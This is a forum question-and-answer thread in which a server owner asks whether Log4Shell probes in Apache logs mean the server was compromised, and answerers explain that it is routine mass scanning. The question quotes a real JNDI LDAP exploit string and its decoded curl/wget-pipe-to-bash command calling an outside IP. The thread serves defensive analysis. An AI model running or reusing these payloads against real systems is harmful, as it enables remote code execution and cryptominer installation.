# successfull log4j exploitation, or just normal traffic?

Tags: webserver, apache, log4shell

First, thanks in advance and sorry if I'm asking some really silly thing, this is not my expertise :)

I have a webserver just for testing my things. Last week I checked if it was vulnerable to log4j CVE and it seemed only Jenkins was using some trace of log4j but inside slf4j (https://www.slf4j.org/log4shell.html) which doesn't seem to be vulnerable on that version.

```
/var/lib/jenkins/plugins/ssh-slaves/WEB-INF/lib/log4j-over-slf4j-1.7.26.jar
```

I updated everything I could just to be on the safe side. I left it there but today I was messing with the apache logs and I started to see entries like this:

```
195.54.160.149 - - [26/Dec/2021:10:43:35 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/longbase64HERE} HTTP/1.1" 200 90
```

Note: the edited base64 once decoded was something like:

```
(curl -s 195.54.160.149:5874/MYIP:443||wget -q -O- 195.54.160.149:5874/MYIP:443)|bash
```

I ran several scripts to detect if there were more traces of log4j on my server, but everything seemed clear.

Should I be concerned that the server is responding with a 200 code?
Thanks

Comment: It's important to remember that with log4j the vulnerable software is not the web server itself, it's the separate logging component.  So the web server might return a 200 but that has no bearing on what the downstream logger might or might not do.

Answer (score 1):

This is a normal log4j mass-scanning. This doesn't mean that it was successful (in this case they were trying to install a cryptominer).

Since you had already upgraded everything (and apparently, you weren't even vulnerable to begin with) that should be fine.

If you have access to firewall logs at that time, you could confirm there was no outgoing connection to 195.54.160.149.

It is of no concern that your webserver returned a 200. It was just replying with the contents of / (plus a parameter it doesn't use at all), so it's normal behavior. What would have been concerning would have been if for example your frontend logged that but a java-based backend had logged just `/?x=`, suggesting that it had interpreted the parameter.

Answer (score 0):

> Should I be concerned that the server is responding with a 200 code? Thanks

Simply looking at the status code does not help here. A successful exploit might lead to a status code 200, 404, ... whatever. An unsuccessful exploit attempt too. So based on this nothing can be said if you need to be concerned or not.

Answer (score 0):

Status code really not matter for this instance. If the domains / IP's you have listed still available just get the bash files and take a quick look. Most of the exploitation happening regarding log4j is mostly crypto-miners.

- You can also listen to outbound - inbound traffic on hosted device to comfort yourself.
- Other than that, [you simply need to follow incident response steps similar to here.](https://www.securitymetrics.com/blog/6-phases-incident-response-plan)